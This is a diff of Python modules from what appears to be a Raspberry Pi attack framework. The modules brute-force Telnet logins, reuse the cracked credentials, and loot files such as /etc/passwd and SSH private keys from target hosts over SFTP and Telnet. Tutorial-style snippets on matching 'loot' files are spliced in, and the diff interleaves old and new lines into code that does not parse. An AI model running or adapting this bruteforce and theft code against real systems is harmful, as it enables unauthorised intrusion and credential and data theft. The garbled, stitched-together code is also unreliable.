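    """Keep paths whose basename ends with a target extension or contains a target substring."""
    out = []
    for fpath in paths:
        fname = os.path.basename(fpath)
        if (exts and any(fname.endswith(e) for e in exts)) or \
           (names and any(n in fname for n in names)):
            out.append(fpath)
    return out

paths = ["/etc/passwd", "/home/pi/notes.txt", "/home/pi/id_rsa", "/var/log/syslog"]
print(match_loot(paths, exts={".txt"}, names={"id_rsa", "passwd"}))
# ['/etc/passwd', '/home/pi/notes.txt', '/home/pi/id_rsa']
```

Note the guard in the caller: with both sets empty this matches nothing, which is why the module refuses to run without filters configured.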
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
"""
Download a single remote file into the given local dir, preserving subdirs.
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
"""
sftp = ssh.open_sftp()
self.sftp_connected = True # first time we open SFTP, mark as connected
try:
# Check file size before downloading
try:
st = sftp.stat(remote_file)
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # stat failed, try download anyway
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
finally:
try:
sftp.close()
except Exception:
pass
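The directory-preserving download path above boils down to one `relpath` computation; `posixpath` is used here only to keep the sketch platform-independent (the module itself uses `os.path` on the Pi):

```python
import posixpath

def local_mirror_path(base_dir: str, remote_file: str) -> str:
    """Mirror /a/b/c.txt under base_dir as base_dir/a/b/c.txt."""
    remote_dir = posixpath.dirname(remote_file)   # e.g. '/home/pi'
    rel = posixpath.relpath(remote_dir, '/')      # e.g. 'home/pi'
    return posixpath.join(base_dir, rel, posixpath.basename(remote_file))

print(local_mirror_path("/loot/ssh/AA_10.0.0.5", "/home/pi/.bash_history"))
# /loot/ssh/AA_10.0.0.5/home/pi/.bash_history
```

Stripping the leading `/` with `relpath(..., '/')` is what keeps the remote tree nested *inside* the loot directory instead of overwriting local absolute paths.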
# --------------------- Orchestrator entrypoint ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Steal files from the remote server using SSH.
Orchestrator entrypoint (signature preserved):
- ip: target IP
- port: str (expected '22')
- row: current target row (compat structure built by shared_data)
- status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'.
"""
timer = None
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
# Gather credentials from DB
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds:
logger.error(f"No SSH credentials for {ip}. Skipping.")
return 'failed'
# Define a timer: if we never establish SFTP in 4 minutes, abort
def _timeout():
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
# Identify where to save loot
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")
# Try each credential until success (or interrupted)
success_any = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying credential {username} for {ip}")
ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config
files = self.find_files(ssh, '/')
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.")
break
self.steal_file(ssh, remote, base_dir)
logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
success_any = True
try:
ssh.close()
except Exception:
pass
if success_any:
break # one successful cred is enough
except Exception as e:
# Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
return 'success' if success_any else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()
if __name__ == "__main__":
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
sd = SharedData()
action = StealFilesSSH(sd)
# Example (replace with a real IP that has creds in DB):
# result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
# print("Result:", result)
except Exception as e:
logger.error(f"Error in main execution: {e}")

@@ -1,180 +1,218 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_telnet.py — Telnet file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
- Credentials read from DB.creds (service='telnet'); we try each pair.
- Files found via 'find / -type f', then retrieved with 'cat'.
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesTelnet initialized")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- Telnet helpers --------
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
try:
tn = telnetlib.Telnet(ip, b_port, timeout=10)
tn.read_until(b"login: ", timeout=5)
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
# prompt detection (naive, but identical to the original)
time.sleep(2)
self.telnet_connected = True
logger.info(f"Connected to {ip} via Telnet as {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
logger.error(f"Telnet connect error {ip} {username}: {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
files = out.splitlines()
matches = []
for f in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
fname = os.path.basename(f.strip())
if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
(self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
matches.append(f.strip())
logger.info(f"Found {len(matches)} matching files under {dir_path}")
return matches
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
logger.error(f"Telnet find error: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("Steal interrupted.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
logger.error(f"Telnet download error {remote_file}: {e}")
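The raw `read_until` capture written above still contains the echoed `cat` command and the trailing shell prompt. A post-processing trim like the following (an assumption, not present in the module) could clean it up:

```python
def trim_telnet_capture(raw: bytes) -> bytes:
    """Drop the echoed command line (first line) and the trailing prompt line."""
    lines = raw.replace(b"\r\n", b"\n").split(b"\n")
    if len(lines) >= 2:
        lines = lines[1:]                      # echoed 'cat <file>' command
    if lines and lines[-1].strip().endswith(b"$"):
        lines = lines[:-1]                     # trailing shell prompt
    return b"\n".join(lines)

raw = b"cat /etc/hostname\r\nbjorn-pi\r\nuser@host:~$"
print(trim_telnet_capture(raw))
# b'bjorn-pi'
```

This only works for text files and a `$`-terminated prompt; binary loot over `cat` would need base64 framing instead.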
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
if not creds:
logger.error(f"No Telnet credentials for {ip}. Skipping.")
return 'failed'
def _timeout():
if not self.telnet_connected:
logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
success = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
tn = self.connect_telnet(ip, username, password)
if not tn:
continue
files = self.find_files(tn, '/')
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(tn, remote, base_dir)
logger.success(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
tn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Telnet loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

@@ -0,0 +1,288 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) provided by the orchestrator
- IP -> (MAC, hostname) via DB.hosts
- Successes -> DB.creds (service='telnet')
- Preserves the original logic (telnetlib, queue/threads)
"""
import os
import telnetlib
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
b_class = "TelnetBruteforce"
b_module = "telnet_bruteforce"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
b_service = '["telnet"]'
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
class TelnetBruteforce:
"""Orchestrator wrapper -> TelnetConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_bruteforce = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""Run the Telnet bruteforce for (ip, port)."""
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Orchestrator entrypoint (returns 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Handles Telnet attempts, DB persistence, and the IP -> (MAC, hostname) mapping."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged from the original
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- file utils ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- DB hosts mapping ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
try:
tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
try:
tn.close()
except Exception:
pass
if response[0] == 2 or response[0] == 3:
return True
except Exception:
pass
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('telnet',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='telnet'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
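The INSERT-OR-IGNORE-then-UPDATE fallback above can be verified against an in-memory SQLite database; this trimmed schema keeps only the columns the two statements actually touch:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE creds(
    service TEXT, ip TEXT, "user" TEXT, "password" TEXT, port INTEGER,
    UNIQUE(service, ip, "user", port))""")

def upsert_cred(ip, user, password, port):
    # Step 1: create the row if this (service, ip, user, port) key is new.
    conn.execute("""INSERT OR IGNORE INTO creds(service, ip, "user", "password", port)
                    VALUES('telnet', ?, ?, ?, ?)""", (ip, user, password, port))
    # Step 2: refresh the password whether the row was new or pre-existing.
    conn.execute("""UPDATE creds SET "password"=?
                    WHERE service='telnet' AND ip=? AND "user"=? AND port=?""",
                 (password, ip, user, port))

upsert_cred("10.0.0.5", "root", "old", 23)
upsert_cred("10.0.0.5", "root", "new", 23)   # same key: updated, not duplicated
rows = conn.execute('SELECT "password" FROM creds').fetchall()
print(rows)  # [('new',)]
```

Two statements instead of one `ON CONFLICT` clause is exactly why the fallback exists: it works even when the table's conflict target does not match what `insert_cred` expects.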
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for Telnet bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
time.sleep(self.shared_data.timewait_telnet)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
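The two-phase drive above (dictionary passwords first, exhaustive fallback only on failure) reduces to a small queue-and-workers skeleton; `try_login` below is a stand-in for the real Telnet attempt:

```python
import threading
from queue import Queue, Empty

def bruteforce(users, dict_pw, fallback_pw, try_login, threads=4):
    found = []
    lock = threading.Lock()

    def run_phase(passwords):
        q = Queue()
        for u in users:
            for p in passwords:
                q.put((u, p))

        def worker():
            while True:
                try:
                    u, p = q.get_nowait()   # non-blocking: exit when drained
                except Empty:
                    return
                try:
                    if try_login(u, p):
                        with lock:
                            found.append((u, p))
                finally:
                    q.task_done()

        ts = [threading.Thread(target=worker, daemon=True) for _ in range(threads)]
        for t in ts:
            t.start()
        q.join()

    run_phase(dict_pw)
    if not found:  # only pay for the exhaustive phase when the dictionary failed
        run_phase(fallback_pw)
    return found

hits = bruteforce(["root"], ["123456"], ["toor"], lambda u, p: p == "toor")
print(hits)  # [('root', 'toor')]
```

The real module adds per-attempt rate limiting and an orchestrator exit flag inside the worker loop, but the control flow is this shape.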
# ---------- DB persistence ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="telnet",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
telnet_bruteforce = TelnetBruteforce(sd)
logger.info("Telnet brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

@@ -1,206 +0,0 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
